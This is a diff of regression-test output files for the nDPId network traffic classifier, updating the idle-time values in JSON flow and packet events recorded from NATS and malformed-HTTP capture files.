-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1586288040558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzT0Oyz8OgBAx1\/4oAAABAQgKNpSeYjaUnmI="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040558,"flow_last_seen":1586288040566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} -00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1586288040575,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1586288040575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0kAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5xAAAAAAQCAAA="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJfixMBXQ63dKsBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5yNpSecQQCAAA="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0r4sTAWgBAx1\/4oAAABAQgKNpSecjaUnnI="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040575,"flow_last_seen":1586288040577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} -00666{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1586288040558,"flow_last_seen":1586288040570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1586288040575,"flow_last_seen":1586288042776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1586288040558,"flow_last_seen":1586288040558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1586288040558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1586288040558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzTwAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iAAAAAAQCAAA="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1586288040558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJA7LPw3wic09sBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iNpSeYgQCAAA="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1586288040558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzT0Oyz8OgBAx1\/4oAAABAQgKNpSeYjaUnmI="} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040558,"flow_last_seen":1586288040566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1586288040575,"flow_last_seen":1586288040575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1586288040575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1586288040575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0kAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5xAAAAAAQCAAA="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1586288040575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJfixMBXQ63dKsBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5yNpSecQQCAAA="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1586288040575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0r4sTAWgBAx1\/4oAAABAQgKNpSecjaUnnI="} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040575,"flow_last_seen":1586288040577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00666{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1586288040558,"flow_last_seen":1586288040570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1586288040575,"flow_last_seen":1586288042776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-data-len":912,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1586288042776} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 27/27 diff --git a/test/results/ndpi_match_string_subprotocol__error.pcapng.out b/test/results/ndpi_match_string_subprotocol__error.pcapng.out index 74a01bd15..211d4f1d3 100644 --- a/test/results/ndpi_match_string_subprotocol__error.pcapng.out +++ b/test/results/ndpi_match_string_subprotocol__error.pcapng.out @@ -1,14 +1,14 @@ 00489{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00575{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1258162014557} -00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258162014557,"flow_last_seen":1258162014557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1258162014557,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258162014557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258162014557,"pkt":"AFBWmXinAB9to6gACABFAAA0MZpAADwGZloKAwkTCkSJdp64H5sCrVC3AAAAAIACwej09wAAAgQFZAEDAwABAQQC"} -01989{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258162014576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1180,"pkt_l4_len":1146,"thread_ts_msec":1258162014576,"pkt":"AFBWmXinAB9to6gACABFAASOMZxAADwGYf4KAwkTCkSJdp64H5sCrVC4lwIqi1AYwhBuiwAAUE9TVCAvQXBjbi9BcGNSZW1vdGVTZXJ2aWNlIEhUVFAvMS4xDQpTT0FQQWN0aW9uOiANCkNvbnRlbnQtdHlwZToAQXBwbGljYXRpb24veG1sDQpVc2VyLUFnZW50OiBKYWthcnRhIENvbW1vbnMtSHR0cENsaWVudC8zLjAuMQ0KSG9zdDogMTAuNjguMTM3LjExODo4MDkxDQpDb250ZW50LUxlbmd0aDogOTQ4DQoNCjxzb2FwZW52OkVudmVsb3Bl2nhtbG5zOm5zPSJ1cmk6Ly9hbGNhdGVsLmNvbS9hcGMvMi4wIiB4bWxuczpzb2FwZW52PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+CiAgPHNvYXBlbnY6SGVhZGVyLz4KICA8c29hcGVudjpCb2R5PgogICAgPG5zOmNvbmZpZ3VyZT4KICAgICAgPG9iamVjdE5hbWQ+TldNMzoxLTEtMS0xNy4wLjA8L29iamVjdKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}} -00975{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258162014582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":422,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":422,"pkt_l4_len":388,"thread_ts_msec":1258162014582,"pkt":"AAAMB6wcAFBWmXinCABFAAGYOjtAAIAGGFUKRIl2CgMJEx+bnriXAiqLAq1VHlAY9oqoWgAASFRUUC8xLsUgMjAwIE9LDQpEYXRlOiBTYXQsIDE0IE5vdiAyMDA5IDAxOjJGOjI3IEdNVA0KU2VydmVyQiBTdW4gR2z6cnNGaXNoIEVudGVycHJpc2UgU2VydmVyIHYyLjENClgtUG93ZXJlZC1CeTogU2VydmxldC8yLjUNCkNvbnRlbnQtVHlw5TogdGV4dC94bWw7Y2hhcnNldD0idXRmLTgiDQpDb250ZW50LUxlbmd0aEwgMTc4DQoNCjw\/eG1sIHZlcnNpb249IjEuMCIgPz48UzpFbnZlbG9wZSB4bWxuczpTPSJodHRwOi8vc2NoZW9hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+PFM6Qm9keT48bnMyOmNvbmZpZ3VyZVJlSnBvbnNlIHhtbG5zOm5zJQAidXJpOi8vYWxjYXRlbC5jb20vYXBjLzIuMCIvPjwvUzpCb2R5PjwvUzpFbnZlbG9wZT4="} +00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258162014557,"flow_last_seen":1258162014557,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1258162014557,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258162014557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258162014557,"pkt":"AFBWmXinAB9to6gACABFAAA0MZpAADwGZloKAwkTCkSJdp64H5sCrVC3AAAAAIACwej09wAAAgQFZAEDAwABAQQC"} +01989{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258162014576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1180,"pkt_l4_len":1146,"thread_ts_msec":1258162014576,"pkt":"AFBWmXinAB9to6gACABFAASOMZxAADwGYf4KAwkTCkSJdp64H5sCrVC4lwIqi1AYwhBuiwAAUE9TVCAvQXBjbi9BcGNSZW1vdGVTZXJ2aWNlIEhUVFAvMS4xDQpTT0FQQWN0aW9uOiANCkNvbnRlbnQtdHlwZToAQXBwbGljYXRpb24veG1sDQpVc2VyLUFnZW50OiBKYWthcnRhIENvbW1vbnMtSHR0cENsaWVudC8zLjAuMQ0KSG9zdDogMTAuNjguMTM3LjExODo4MDkxDQpDb250ZW50LUxlbmd0aDogOTQ4DQoNCjxzb2FwZW52OkVudmVsb3Bl2nhtbG5zOm5zPSJ1cmk6Ly9hbGNhdGVsLmNvbS9hcGMvMi4wIiB4bWxuczpzb2FwZW52PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+CiAgPHNvYXBlbnY6SGVhZGVyLz4KICA8c29hcGVudjpCb2R5PgogICAgPG5zOmNvbmZpZ3VyZT4KICAgICAgPG9iamVjdE5hbWQ+TldNMzoxLTEtMS0xNy4wLjA8L29iamVjdKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} +01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}} +00975{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258162014582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":422,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":422,"pkt_l4_len":388,"thread_ts_msec":1258162014582,"pkt":"AAAMB6wcAFBWmXinCABFAAGYOjtAAIAGGFUKRIl2CgMJEx+bnriXAiqLAq1VHlAY9oqoWgAASFRUUC8xLsUgMjAwIE9LDQpEYXRlOiBTYXQsIDE0IE5vdiAyMDA5IDAxOjJGOjI3IEdNVA0KU2VydmVyQiBTdW4gR2z6cnNGaXNoIEVudGVycHJpc2UgU2VydmVyIHYyLjENClgtUG93ZXJlZC1CeTogU2VydmxldC8yLjUNCkNvbnRlbnQtVHlw5TogdGV4dC94bWw7Y2hhcnNldD0idXRmLTgiDQpDb250ZW50LUxlbmd0aEwgMTc4DQoNCjw\/eG1sIHZlcnNpb249IjEuMCIgPz48UzpFbn